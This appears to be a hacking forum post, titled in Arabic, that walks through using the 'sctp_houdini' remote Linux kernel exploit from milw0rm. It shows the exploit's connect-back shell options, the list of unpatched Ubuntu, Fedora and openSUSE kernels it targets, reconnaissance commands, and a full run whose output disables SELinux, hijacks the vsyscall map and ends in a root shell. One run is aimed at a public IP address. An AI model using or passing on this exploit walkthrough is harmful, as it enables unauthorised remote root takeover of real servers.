2.6 sctp_houdini ريموت جديد ! شــرح

http://www.milw0rm.org/exploits/8556

[r1z@0wnEd ]# ./2.6.x-remote
./sctp_houdini
        -H lhost   (local host address for connect back shel)
        -P lport   (local port address for connect back shell)
        -h rhost   (remote target host)
        -p rport   (remote target port)
        -t kernel  (target kernel)
        -s sport   (source port defining sctp association where corruption occurs)
                   (always use higher port if you run the exploit multiple times eg. 20000, 21000, etc..)
                   (NEVER reuse the same or next port or vsys will be trashed and init will die soon...)
        -c conn    (number of connectionis before corruption - default 600)
[root@vps9224 html]# ./2.6-r -H 72.167.131.130 -P 5555 -h 72.167.131.130 -p 20000 -s 15000 -c 700 -t 2.4.21-53.ELsmp
Unable to find target: 2.6.24-19-xen
Available targets are:
- ubuntu64_faisty-2.6.20-[15-17]-generic  (faisty: generic kernel)
- ubuntu64_faisty-2.6.20-17-server  (faisty: server kernel - last 2.6.20-17 build)
- ubuntu64_hardy-2.6.24-[18-21]-generic  (kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)
- ubuntu64_hardy_2.6.24-[16-18]-server  (kernel from 2.6.24-16 to 2.6.24-18 -- server)
- ubuntu64_hardy-2.6.24-[19-22]-server  (kernel from 2.6.24-19 to 2.6.24-22 -- server)
- ubuntu64_hardy-2.6.24-23-last-server  (last 2.6.24-23 kernel before patch -- server)
- ubuntu64_intrepid-2.6.27-7-server  (kernel 2.6.27-7 -- server)
- ubuntu64_intrepid-2.6.27-[9-last]-server  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- ubuntu64_intrepid-2.6.27-[7-last]-generic  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- fedora64_10-2.6.25-117  (fedora core 10 default installed kernel)
- opensuse64_11.1-2.6.27.7-9-default  (opensuse 11.1 default installed kernel)
[r1z@0wnEd ]#

-H lhostl

127.0.0.1

-P lport

5555

-h rhost

192.168.1.1

20000

-t kernel

uname -r

- ubuntu64_faisty-2.6.20-[15-17]-generic  (faisty: generic kernel)
- ubuntu64_faisty-2.6.20-17-server  (faisty: server kernel - last 2.6.20-17 build)
- ubuntu64_hardy-2.6.24-[18-21]-generic  (kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)
- ubuntu64_hardy_2.6.24-[16-18]-server  (kernel from 2.6.24-16 to 2.6.24-18 -- server)
- ubuntu64_hardy-2.6.24-[19-22]-server  (kernel from 2.6.24-19 to 2.6.24-22 -- server)
- ubuntu64_hardy-2.6.24-23-last-server  (last 2.6.24-23 kernel before patch -- server)
- ubuntu64_intrepid-2.6.27-7-server  (kernel 2.6.27-7 -- server)
- ubuntu64_intrepid-2.6.27-[9-last]-server  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- ubuntu64_intrepid-2.6.27-[7-last]-generic  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- fedora64_10-2.6.25-117  (fedora core 10 default installed kernel)
- opensuse64_11.1-2.6.27.7-9-default  (opensuse 11.1 default installed kernel)

-s sport

 Stream Control Transmission Protocol (SCTP)

[r1z@0wnEd ]# locate sctp | grep `uname -r`
/lib/modules/2.6.24-19-xen/kernel/net/sctp
/lib/modules/2.6.24-19-xen/kernel/net/netfilter/nf_conntrack_proto_sctp.ko
/lib/modules/2.6.24-19-xen/kernel/net/netfilter/xt_sctp.ko
/lib/modules/2.6.24-19-xen/kernel/net/sctp/sctp.ko
[r1z@0wnEd ]#

-c conn

[r1z@0wnEd ]#./2.6.x-remote -H 127.0.0.1 -P 5555 -h 192.168.1.1 -p 20000 -s 15000 -c 600 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0


[r1z@0wnEd ]#GAME OVER